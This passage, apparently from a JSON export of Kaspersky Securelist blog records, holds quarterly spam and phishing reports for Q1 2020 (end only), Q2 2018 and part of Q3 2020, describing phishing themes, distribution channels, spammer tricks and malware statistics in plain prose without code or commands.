social network, or the result of a malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThe largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.\n\n_Distribution of organizations affected by phishing attacks by category, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213351/sl_spam_report_10-en-raspredelenie-organizacij-chi-polzovateli-byli-atakovany-fisherami-po-kategoriyam-pervyj-kvartal-2020-g.png>)_\n\nAs for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.\n\n## Conclusion\n\nGlancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on \"standard\" fake pages and in spam mailings.\n\nThe topic is also used extensively in fraudulent schemes offering compensation and material assistance.\n\nIt is highly likely that this type of fraud will become more frequent.\n\nThe average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.\n\nTop of this quarter's list of spam-source countries is Russia, with a share of 20.74%. Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.", "modified": "2020-05-26T10:00:50", "published": "2020-05-26T10:00:50", "id": "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "href": "https://securelist.com/spam-and-phishing-in-q1-2020/97091/", "type": "securelist", "title": "Spam and phishing in Q1 2020", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-14T10:31:27", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### GDPR as a phishing opportunity\n\nIn the first quarter, we discussed spam designed to exploit GDPR (General Data Protection Regulation), which came into effect on May 25, 2018. Back then spam traffic was limited to invitations to participate in workshops and other educational events and purchase software or databases. We predicted that fraudulent emails were soon to follow. And we found them in the second quarter.\n\nAs required by the regulation, companies notified email recipients that they were switching to a new GDPR-compliant policy and asked them to confirm permission to store and process personal information. This was what criminals took advantage of. To gain access to the personal information of well-known companies' customers, criminals sent out phishing emails referencing the GDPR and asking recipients to update their account information. To do this, customers had to click on the link provided and enter the requested data, which immediately fell into the hands of the criminals. It must be noted that the attackers were targeting customers of financial organizations and IT service providers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122429/180810-spam-report-q2-18-1.png>)\n\n_Phishing emails exploiting GDPR_\n\n### Malicious IQY attachments\n\nIn the second quarter, we uncovered several malspam incidents with never-before-seen IQY (Microsoft Excel Web Query) attachments. Attackers disguise these files as invoices, order forms, document copies, etc., which is a known ploy that is still actively used for malspamming. The From field contains addresses that look like personal emails, and names of attachments are generated in accordance with the following template: the name of the attachment, and then either a date or a random number sequence.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122440/180810-spam-report-q2-18-2.png>)\n\n_Harmful .iqy files_\n\nWhen the victim opens the IQY file, the computer downloads several trojan-downloaders, which install the Flawed Ammyy RAT backdoor. The infection chain may look like this: Trojan-Downloader.MSExcel.Agent downloads another downloader from the same family, which, in turn, downloads Trojan-Downloader.PowerShell.Agent, then this trojan downloads Trojan-Downloader.Win32.Dapato, which finally installs the actual Backdoor.Win32.RA-based.hf (also known as Flawed Ammyy RAT) used to gain remote access to the victim's computer, steal files and personal information, and send spam.\n\nIt is rather difficult to detect these attachments because these files look like ordinary text documents which transfer web-inquiry data transfer parameters from remote sources to Excel spreadsheets. IQY files can also be a very dangerous tool in the hands of criminals because their structure is no different from the structure of legitimate files, yet they can be used to download any data at all.\n\nIt must be noted that malspam with IQY attachments is distributed via the largest botnet called Necurs. As a reminder, this is the botnet responsible for malspam (ransomware, macro-viruses, etc.), as well as pump-and-dump and dating spam. The botnet's operation is characterized by periods of spiking and idling while infection and filter evasion mechanisms become ever more sophisticated.\n\n### Data leaks\n\nThe wave of confidential information leaks we discussed in the previous quarter is still on the rise. Here are some of the most notable events of the quarter:\n\n * Hacking and theft of personal information of 27M Ticketfly customers;\n * 92M MyHeritage genealogy service users' personal information was discovered on a public server;\n * 340M individual records were lost by Exactis, a marketing company;\n * An unprotected Amazon server allowed access to the personal information of 48M Facebook, LinkedIn, Twitter, and Zillow users.\n\nAs a result of such leaks, cybercriminals get a hold of users' names, email addresses, phone numbers, dates of birth, credit card numbers, and personal preferences. This information may later be used to launch targeted phishing attacks, which are the most dangerous type of phishing.\n\n### Cryptocurrency\n\nIn the second quarter, our antiphishing system prevented 58,000 user attempts to connect to phishing websites masquerading as popular cryptocurrency wallets and markets. In addition to classic phishing, which aims at gaining access to the victim's accounts and private key information, cybercriminals try every way to entice a victim to willingly send them cryptocurrency. One of the examples of this are cryptocoin giveaways. Cybercriminals continue using the names of new ICO projects to collect money from potential investors that are trying to gain early access to new tokens. Sometimes phishing sites pop up before official project sites.\n\nEthereum (ETH) is currently the most popular cryptocurrency with phishers. The popularity of Ethereum with cybercriminals increases as more funds are attracted by [ICOs on the Ethereum platform](<https://www.kaspersky.ru/blog/ethereum-ico/19025/>). According to our very rough estimate (based on data received from over a thousand ETH wallets used by malefactors), over the Q2 2018, cybercriminals exploiting ICOs [managed to make](<https://securelist.com/in-cryptoland-trust-can-be-costly/86367/>) $2,329,317 (end-of-July-2018 exchange rate), traditional phishing not included.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122449/180810-spam-report-q2-18-3.png>)\n\n_Fake ICO project pages: the first is located on fantom.pub and imitates fantom.foundation, the real site of the FANTOM project; the second one, found on sparkster.be, is an imitation of sparkster.me, the original SPARKSTER site_\n\n### World Cup 2018\n\nCybercriminals from all over the world prepared for the World Cup as much as its organizers and soccer fans. The World Cup was used in many traditional scamming methods using social engineering. Cybercriminals created fake championship partner websites to gain access to victims' bank and other accounts, carried out targeted attacks, and created [bogus fifa.com account sign-in pages](<https://securelist.ru/2018-fraud-world-cup/90108/>).\n\n### HTTPS\n\n[As mentioned in the 2017 report](<https://securelist.com/spam-and-phishing-in-2017/83833/#phishing-pages-migrate-to-https>), more and more phishing pages are now found on [certified](<https://encyclopedia.kaspersky.ru/glossary/digital-certificates/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) domains. Those may include hacked or specially registered domains that cybercriminals use to store their content. This has to do with the fact that most of the Internet is switching to HTTPS and it has become easy to get a simple certificate. In the middle of the second quarter, this prompted Google to [announce future efforts](<https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html>) aimed at changing the way Chrome works with certificates. Starting in September 2018, the browser (Chrome 69) will stop marking HTTPS sites as \"Secure\" in the URL bar. Instead, starting in October 2018, Chrome will start displaying the \"Not secure\" label when users enter data on unencrypted sites. \n\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10123710/180810-spam-report-q2-18-3-5.gif>)\n\n_When Chrome 70 comes out in October 2018, a red \"Not secure\" marker will be displayed for all HTTP sites where users enter data._\n\nGoogle believes that this will make more sites use encryption. After all, users should expect the web to be safe by default and receive warnings only in the event of any issues.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122456/180810-spam-report-q2-18-4.png>)\n\n_An example of a certified phishing website marked as \"Secure\"._\n\nAt the moment, the green Secure message in the URL bar is rather misleading for a user, especially when they visit a phishing website.\n\n### Vacation season\n\nIn anticipation of the vacation season, cybercriminals have used all of the possible topics that may interest travelers, [from airplane ticket purchases to hotel bookings](<https://www.kaspersky.com/blog/protect-your-vacation/22352>). For instance, we've found many websites that offer very tempting accommodations at absurd prices (e.g., an entire four-bedroom house in Prague with a pool and a fireplace at $1,000 a month). Such websites pose as Amazon, TripAdvisor, and other sites popular among travelers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122505/180810-spam-report-q2-18-5.png>)\n\n_An example of a fake hotel booking website_\n\nA similar method is used to fake ticket aggregator websites. In these cases, the displayed flight information is real, but the tickets turn out to be fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122513/180810-spam-report-q2-18-6.png>)\n\n_An example of fake airline ticket websites_\n\n## Distribution channels\n\nIn our reports, we regularly point out you that phishing and other spam has gone way beyond email a long time ago. Attackers use every means of communication at their disposal and even recruit unsuspecting users themselves for malware distribution. In this quarter, most large-scale attacks were found in messengers and on social networks.\n\n### WhatsApp\n\nCybercriminals have been using WhatsApp more frequently to distribute their content lately. WhatsApp users copy and resend spam messages themselves, just like they used to do with luck chain letters many years ago. Most of these messages contain information about fictional lotteries or giveaways (we have already discussed these types of scams many times). Last quarter, cybercriminals brought back the airplane ticket giveaways. This quarter in Russia, for instance, they used names of [popular retailers](<https://www.kaspersky.ru/blog/coupon-scam/20830>) such as Pyaterochka and Leroy Merlin, and also McDonald's. Some fake messages come from popular sportswear brands, as well as certain stores and coffee shops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122520/180810-spam-report-q2-18-6-5.jpg>)\n\n_Users share messages about ticket raffles with their contacts via a messenger since it's one of the conditions for winning_\n\nOnce a user has sent the message to some friends, he or she is redirected to another resource, the content of which changes depending on the victim's location and device. If the user visits the site from their smartphone, most often they are automatically subscribed to paid services. The user may also be redirected to a page containing a survey or a lottery or to some other malicious website. For instance, a user may be invited to install a browser extension which will later intercept the data they enter on other websites and use their name to do other things online, such as publish posts on social media.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122527/180810-spam-report-q2-18-7.png>)\n\n_An example of a page which a user is redirected to after a survey, at the end of which they were promised a coupon to be used in a popular retail chain. As you can see, no coupon has been received, but the user is invited to install a browser extension with suspicious permissions._\n\n### Twitter and Instagram\n\nCybercriminals have been using Twitter to distribute fraudulent content for a long time. However, it has recently become a breeding ground for fake celebrity and company accounts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122533/180810-spam-report-q2-18-8.png>)\n\n_Fake account for Pavel Durov_\n\nThe most popular cover used by cybercriminals is cryptocurrency giveaways on behalf of celebrities. The user is asked to transfer a small amount of cryptocurrency to a certain wallet to get double or triple coins back. To enhance trust, the wallet may be located on a separate website, which also contains a list of fake transactions that the victim can see \"updating\" in real time, which confirms that any person who transfers money to the fake wallet gets back several times the amount transferred. Of course, the victim does not receive anything. Despite the simplicity of this scheme, it makes cybercriminals millions of dollars. This quarter, cybercriminals favoured the names of Elon Musk, Pavel Durov, and Vitalik Buterin in their schemes. These names were chosen for a reason \u2014 Elon Musk is an entrepreneur, inventor, and investor, while Durov and Buterin made it to the cryptocurrency market leader list [published by Fortune](<http://fortune.com/the-ledger-40-under-40>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122541/180810-spam-report-q2-18-9.png>)\n\n_An example of a website advertised on Elon Musk's fake account_\n\nNews sensations make these schemes even more effective. For instance, the shutdown of the Telegram messenger generated a wave of fake messages from \"Pavel Durov\" promising compensation. In this case cybercriminals use similarly-spelled account names. For example, if the original account name contains an underscore, cybercriminals register a new user with two underscores in the name and publish messages about cryptocurrency giveaways in comments to the celebrities' authentic Twitter posts. As a result, even a detail-oriented person may have a hard time spotting the fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122549/180810-spam-report-q2-18-10.png>)\n\nTwitter administration promised to stop this type of fraud a long time ago. One of their first steps involved blocking accounts that tried to change the user's name to Elon Musk, and most probably other names commonly used by cybercriminals as well. However, it is easy to keep the account from being blocked by entering a Captcha and a code sent via text, after which the user can keep Elon's name or change it to anything they want\u2014 the account will not be blocked again. It is also unclear whether Twitter will block the obfuscated names of famous people that are often exploited by cybercriminals.\n\nAnother measure taken by the social network is blocking accounts that post links to Elon Musk's account. Just like in the previous example, the account can be unblocked by entering a Captcha and confirming a phone number via a code received in a text message.\n\nThis scam has started spreading to other platforms as well. Fake accounts can also be found on Instagram.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10124414/180810-spam-report-q2-18-10-5.jpg>)\n\n_Vitalik Buterin's fake Instagram account_\n\n### Facebook\n\nOn Facebook, in addition to the aforementioned content distribution through viral threads, cybercriminals often use the advertising mechanisms offered by the social network. We have recorded instances of get-rich-quick schemes being spread through Facebook ads.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122556/180810-spam-report-q2-18-11.png>)\n\n_Fraudulent website ad on Facebook_\n\nAfter clicking on the ad, the user is redirected to a website where, after completing a few steps, they are offered a reward. To receive this reward, the user must either pay a fee, enter their credit card information, or share some personal details. Of course, the user does not receive any reward in the end.\n\n### Search results\n\nAds with malicious content and links to phishing sites can be found not only on social networks, but also in the search results pages of major search engines. This has recently become a popular method of advertising fake ICO project websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122602/180810-spam-report-q2-18-12.png>)\n\n_Users do not always notice the \"Ad\" label next to the ads_\n\n## Spammer tricks\n\nLast quarter, spammers tried to use the following new tricks to evade filters.\n\n### Double email headers\n\nWhen generating spam emails, spammers use two From fields in the email header. The first From field contained a legitimate address, usually one from a well-known organization (whose reputation is untarnished by spam scandals) while the second contained the actual spammer email address, which has nothing to do with the first one. Spammers were expecting the email to be treated as legitimate by filters, forgetting that modern anti-spam solutions rely not only on the technical part of the email, but also on its content.\n\n### Subscription forms\n\nIn these events, spam messages in the form of an automatic mailing list subscription confirmations arrive in recipient inboxes. Regular websites capable of unlimited user registration were employed to create them (especially when they allowed using the same email address multiple times). Spammers used a script that auto-filled subscription forms inserting recipient addresses from previously collected (or purchased) databases. Spam content was a short phrase with a link to a spam resource inserted into one of the mandatory fields in the form (in particular, the recipient name). As a result, the user received a notification sent from a legitimate mail address containing a spam link instead of their name.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122609/180810-spam-report-q2-18-13.png>)\n\n_An example of spam mail sent using the subscription service on a legal site_\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nProportion of spam in global email traffic, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122615/180810-spam-report-q2-18-14.png>)\n\nIn the Q2 2018, the largest percentage of spam was recorded in May at 50.65%. The average percentage of spam in world mail traffic is 49.66%, which was 2.16 p.p. lower than the previous reporting period.\n\n### Sources of spam by country\n\nSpam -originating countries, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122622/180810-spam-report-q2-18-15.png>)\n\nThe leading spam-originating country in Q2 2018 was Vietnam (3.98%), which fell to seventh place in the second quarter, replaced by China (14.36%). The second and third places, the USA in Germany, are only one percentage point apart, with 12.11% and 11.12% shares, respectively. France occupied the fourth place (4.42%), and the fifth was occupied by Russia (4.34%). Great Britain occupied the tenth place (2.43%).\n\n### Spam email size\n\nSpam email size, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122628/180810-spam-report-q2-18-16.png>)\n\nThe results of the Q2 2018 indicate that the share of very small spam messages (up to 2 KB) fell 2.45 p.p. to 79.17%. The percentage of 5-10 KB spam messages, on the other hand, grew somewhat (by 1.45 p.p.) in comparison with the previous quarter and amounted to 5.56%.\n\nThe percentage of 10-20 KB spam messages was practically unchanged \u2014 it went down by 0.93 p.p. to 3.68%. 20-50 KB spam messages saw a similar trend, their share decreasing by 0.4 p.p. (to 2.68%) in comparison with the previous reporting period.\n\n### Malicious attachments: malware families\n\nTop 10 malware families, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122634/180810-spam-report-q2-18-17.png>)\n\nAccording to the results of the Q2 2018, the most widely-distributed family of malware by-mail was Exploit.Win32.CVE-2017-11882 (with 10.35%)/ This is the verdict attributed to various malware that exploited the CVE-2017-11882 vulnerability in Microsoft Word. The amount of mail with the Trojan-PSW.Win32.Fareit malware family in it, which steals user information and passwords, decreased during the second quarter, losing the first place and now occupying the second place (with 5.90%). The third and fourth places are occupied by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%). The Worm.Win32.WBVB family was the fifth most popular malware with cybercriminals.\n\n### Countries targeted by malicious mailshots\n\nDistribution of Mail Anti-Virus triggers by country, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122641/180810-spam-report-q2-18-18.png>)\n\nThe first, second, and third places among the countries with the highest quantity of Mail Anti-Virus triggers in Q2 2018 were unchanged. Germany remained in the first place (9.54%), and the second and third places were taken by Russia and Great Britain (8.78% and 8.67%, respectively). The fourth and fifth places were taken by Brazil (7.07%) and Italy (5.39%).\n\n## Statistics: phishing\n\nIn the Q2 2018, the Antiphishing prevented **107,785,069** attempts to connect users to malicious websites. 9.6% of all Kaspersky Lab users around the world were subject to attack.\n\n### Geography of attacks\n\nThe country with the highest percentage of users attacked by phishing in Q2 2018 was again Brazil, with 15.51% (-3.56 p.p.).\n\nGeography of phishing attacks, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122648/180810-spam-report-q2-18-19.png>)\n\n**Country** | **%*** \n---|--- \nBrazil | 15.51 \nChina | 14.77 \nGeorgia | 14.44 \nKyrgyzstan | 13.60 \nRussia | 13.27 \nVenezuela | 13.26 \nMacao | 12.84 \nPortugal | 12.59 \nBelarus | 12.29 \nSouth Korea | 11.66 \n \n_* Percentage of users whose Antiphishing system triggered against all Kaspersky Lab users in the respective country._\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._[/caption] \n\nIn Q2 2018, the Global Internet Portals category again took first place with 25.00% (+1.3 p.p.).\n\n_Distribution of organizations affected by phishing attacks by category, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122656/180810-spam-report-q2-18-20.png>)\n\nThe percentage of attacks on organizations that may be combined into a general Finance category (banks, at 21.10%, online stores, at 8.17%, and payment systems, at 6.43%) fell to 35.70% (-8.22 p.p.). IT companies in the second quarter were more often subject to threats then in the first quarter. This category saw an increase of 12.28 p.p. to 13.83%.\n\n## Conclusion\n\nAverage spam volume of 49.66% in world mail traffic in this quarter fell 2.16 p.p. in comparison with the previous reporting period, and the Antiphishing system prevented more than 107M attempts to connect users to phishing sites, which is 17M more than in the first quarter of 2018.\n\nIn this quarter, malefactors actively used GDPR, World Cup, and cryptocurrency themes, and links to malicious websites could be found on social networks and messengers (users were often distributing them themselves), as well as in marketing messages served by large search engines.\n\nExploit.Win32.CVE-2017-11882 was the most widely-distributed family of malware via mail, at 10.35%. Trojan-PSW.Win32.Fareit fell from the first place to the second place (5.90%), and the third and fourth places were taken by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%).", "modified": "2018-08-14T10:00:36", "published": "2018-08-14T10:00:36", "id": "SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "href": "https://securelist.com/spam-and-phishing-in-q2-2018/87368/", "type": "securelist", "title": "Spam and phishing in Q2 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-11-12T10:20:22", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### Worming their way in: cybercriminal tricks of the trade\n\nThese days, many companies distribute marketing newsletters via online platforms. In terms of capabilities, such platforms are quite diverse: they send out advertising and informational messages, harvest statistics (for example, about clicked links in emails), and the like. At the same time, such services attract both spammers, who use them to send their own mailings, and cybercriminals, who try to gain access to user accounts, usually through phishing. As a result, attackers also get their hands on user-created mailing lists, which allows them to disseminate mass advertising or phishing messages that filtering systems sometimes let through.\n\nAccordingly, in Q3 we registered an increase in the number of messages sent [using the Sendgrid platform](<https://krebsonsecurity.com/2020/08/sendgrid-under-siege-from-hacked-accounts/>). A significant portion of them were phishing attacks aimed at stealing login credentials for major resources. The emails were no different from traditional phishing, save for the legitimate headers and link to Sendgrid, which redirected the recipient to a phishing site. To the observant eye, the address bar and From field would reveal the messages to be fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092048/sl_Spam_report_Q3_2020_01.png>)\n\n### Call me!\n\nIn [our previous quarterly report](<https://securelist.com/spam-and-phishing-in-q2-2020/97987/#srochno-trebuyutsya-vashi-dannye>), we talked about an increasingly common scam whereby fraudsters send emails purportedly from large companies with a request to urgently contact support at the given phone number. Users who contacted the operator were then asked for information, such as bank card details, which could then be used to empty their account. The most commonly used toll-free numbers have specific three-digit prefixes after the country code (for example: 800, 888, 844).\n\nIn Q3 2020, we observed new versions of such schemes warning not only about unauthorized account access, but about money transactions supposedly made by the user. The attackers&#x27; calculation is that, on seeing a message about a financial transaction, the client will grab their phone and dial the support number highlighted in bold. Such emails do not contain links, and the message itself is an image, which makes it harder to detect.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092134/sl_Spam_report_Q3_2020_05.png>)\n\n \n\nScammers like such schemes, because sending spam is much cheaper and easier than calling potential victims. To avoid swallowing the bait, either call the support service using the number on the organization&#x27;s official website (not the one in the email), or use an app that protects against telephone fraud by checking outgoing call numbers.\n\n### COVID-19 and spam topics\n\n#### Facebook grants\n\nIn Q3 2020, many users of social networks and messengers saw a screenshot with some interesting news: CNBC, it said (in broken English \u2014 always a red flag), had reported that Facebook was paying out compensation to victims of COVID-19. To get yours, all you had to do was follow the link and fill out a number of documents.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092224/sl_Spam_report_Q3_2020_06.png>)\n\nThe link had nothing to do with Facebook and led to a fake page resembling the website of Mercy Corps, an organization dedicated to helping victims of natural disasters and armed conflict. To apply, you had to enter your Facebook username and password, then verify your identity by providing personal information, including SSN (social security number, issued to US citizens). This last detail suggests that the attack was aimed at US residents. Users that entered all the requested data gave the cybercriminals not only access to their social network account, but also personal information that could then be used for identity theft or bank card fraud.\n\nIt should be noted that the scheme was based on official news that Facebook was indeed ready to provide support to victims of COVID-19. But it only concerned grants for companies, not individuals.\n\n#### Tourist phishing\n\nThe coronavirus pandemic \u2014 which has decimated the tourist trade \u2014 has also had an effect on scammers: this quarter saw fewer emails offering attractive summer breaks than usual. However, the pandemic did not stop scammers, only redirected their attention.\n\nIn Q3, Airbnb and Expedia Group users were the most frequent targets of phishing attacks. Fake pages hungry for user credentials were very faithful to the design of the official websites, distinguishable only by looking closely at the address bar, where most often the domain was unrelated to the target company or belonged to a free hosting service.\n\nSo as not to reveal their cards too soon, scammers use URL-shortening services and distribute messages in social networks and messengers where shortened links look organic. In their messages, scammers offer cheap tickets or bargain hotel deals. And it is impossible to know where such links lead before clicking them, which is what attackers play upon. Accounts stolen in this way can be used, for example, for money laundering.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092251/sl_Spam_report_Q3_2020_07.png>)\n\nPhishers also forged pages with rental offers: visitors could view photos of apartments and read detailed information about the alleged terms and conditions. Lower down the page were rave reviews from past clients intended to lull the victim into a false sense of security.\n\nThe &quot;landlord&quot; in each case agreed to rent out the apartment, but asked for an advance payment. And then disappeared as soon as the money was deposited, together with the fake page. In this instance, the cybercriminals also banked on the fact that the juicy offer (low price, big discount) would distract the victim from looking at the URL and checking the information on the site.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092307/sl_Spam_report_Q3_2020_08.jpg>)\n\n### Attacks on the corporate sector\n\n#### Malicious mail\n\n[We already told](<https://securelist.com/spam-and-phishing-in-q2-2020/97987/#waiting-for-your-package-keeping-your-data-secure-and-your-computer-clean>) about the distribution of malicious files disguised as notifications from delivery services. They continued this quarter as well: we uncovered a mailing targeting employees connected to sales in some capacity. The scammers persuaded recipients to open the attached documents supposedly to pay customs duties for the import of goods. Instead of documents, the attachment contained Backdoor.MSIL.Crysan.gen.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092426/sl_Spam_report_Q3_2020_09.png>)\n\nMalicious mailings with &quot;reminders&quot; about online meetups are worth a separate mention. For example, one of them asked the recipient to join a Zoom conference by clicking the attached link. Instead of a meeting, the user ended up on a WeTransfer phishing page. If the user fell for the trap and entered their WeTransfer credentials, the attackers gained access to the company&#x27;s files stored in this cloud.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092447/sl_Spam_report_Q3_2020_10.png>)\n\nAnother mailing informed users that a Microsoft SharePoint document had been shared with them. After clicking the link, the victim was taken to a fake Microsoft login page that helped cybercriminals steal account usernames and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092506/sl_Spam_report_Q3_2020_11.png>)\n\nFar more dangerous were meeting notifications containing malicious files. For example, the at-first-glance harmless message below contained HEUR:Trojan-Downloader.Script.Generic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092524/sl_Spam_report_Q3_2020_12.png>)\n\nAnd Trojan-Banker.Win32.ClipBanker, downloaded via the link in the email below, is used to steal financial (including cryptocurrency-related) information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092544/sl_Spam_report_Q3_2020_13.png>)\n\n#### Mail scanner\n\nTo gain access to corporate accounts, cybercriminals distributed messages stating that a virus had been found in the recipient&#x27;s mailbox, and advising an urgent scan, otherwise the account would be disabled. The messages, disguised as notifications from infosec companies, were sent from a free mail address and employed neutral names like Email Security Team to avoid unnecessary specifics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092605/sl_Spam_report_Q3_2020_14.png>)\n\nThe cybercriminals reckoned on the combined threat of a computer virus and a deactivated work email account forcing the recipient to ignore some of the oddities of the message. For example, such emails could be from the company&#x27;s IT or security department, but not a third party. The page that opened on clicking the link did not resemble a corporate resource by either its address or layout. Plus, for added believability, the cybervillains placed on it the logos of all major infosec companies.\n\nTo start a &quot;virus scan&quot;, the user was asked to enter the username and password for their corporate mailbox. That said, the &quot;scan&quot; started even if arbitrary credentials were entered in the fields:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092624/sl_Spam_report_Q3_2020_15.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q2 2020 \u2013 Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12093946/01-en-spam-report-q3-2020.png>))_\n\nIn Q3 2020, the largest share of spam was recorded in August (50.07%). The average share of spam in global mail traffic was 48.91%, down 1.27 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094027/03-en-spam-report-q3-2020.png>))_\n\nThe Top 5 countries by amount of outgoing spam remained the same as in the previous quarter. Only their shares changed. The biggest increase came from Russia, which ranked first, jumping by 5 p.p. to 23.52%. The shares of the remaining top-fivers did not fluctuate by more than one percentage point. Second-place Germany gained 11.01%, the US in third picked up 10.85%, France 6.69%, and China in fifth 6.33%.\n\nThe bottom half of the Top 10 changed more significantly. For instance, it said goodbye to Turkey, which this time took 11th place (1.73%). Sixth place was taken by the Netherlands (3.89%), seventh by Brazil (3.26%), eighth by Spain (2.52%), ninth by Japan (2.30%), and Poland (1.80%) rounds out the Top 10, up one position on last quarter.\n\n### Spam email size\n\n_Spam email size, Q2 2020 \u2013 Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094113/04-en-spam-report-q3-2020.png>))_\n\nThe downward trend in the number of very small emails continued in Q3 2020; their share decreased significantly \u2014 by 13.21 p.p. to 38.09%. The share of emails sized 20\u201350 KB grew by 12.45 p.p. to 28.20% of the total number of registered spam emails. But the number of emails 10\u201320 KB in size fell to 8.31% (\u20132.78 p.p.). Also lower was the share of spam messages sized 100\u2013200 KB; this time their share was 1.57%.\n\n### Malicious attachments: malware families\n\n_Number of Mail Anti-Virus triggerings, Q2 2020 \u2013 Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094147/05-en-spam-report-q3-2020.png>))_\n\nThroughout Q3 2020, our security solutions detected a total of **51,025,889** malicious email attachments, which is almost **8 million** more than in the previous reporting period.\n\n_Top 10 malicious attachments in mail traffic, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094224/06-en-spam-report-q3-2020.png>))_\n\nThe most widespread malware in Q3 mail traffic was assigned the verdict Trojan-PSW.MSIL.Agensla.gen (8.44%). In second place was Exploit.MSOffice.CVE-2017-11882.gen (5.67%), while Trojan.MSOffice.SAgent.gen (4.85%) came third.\n\n_Top 10 malware families in mail traffic, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094259/07-en-spam-report-q3-2020.png>))_\n\nThis quarter&#x27;s most widespread malware family was [Trojan-PSW.MSIL.Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) (12.67%), having ranked second in the last reporting period. While last quarter&#x27;s leader [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) finished second (8.78%). Third place, 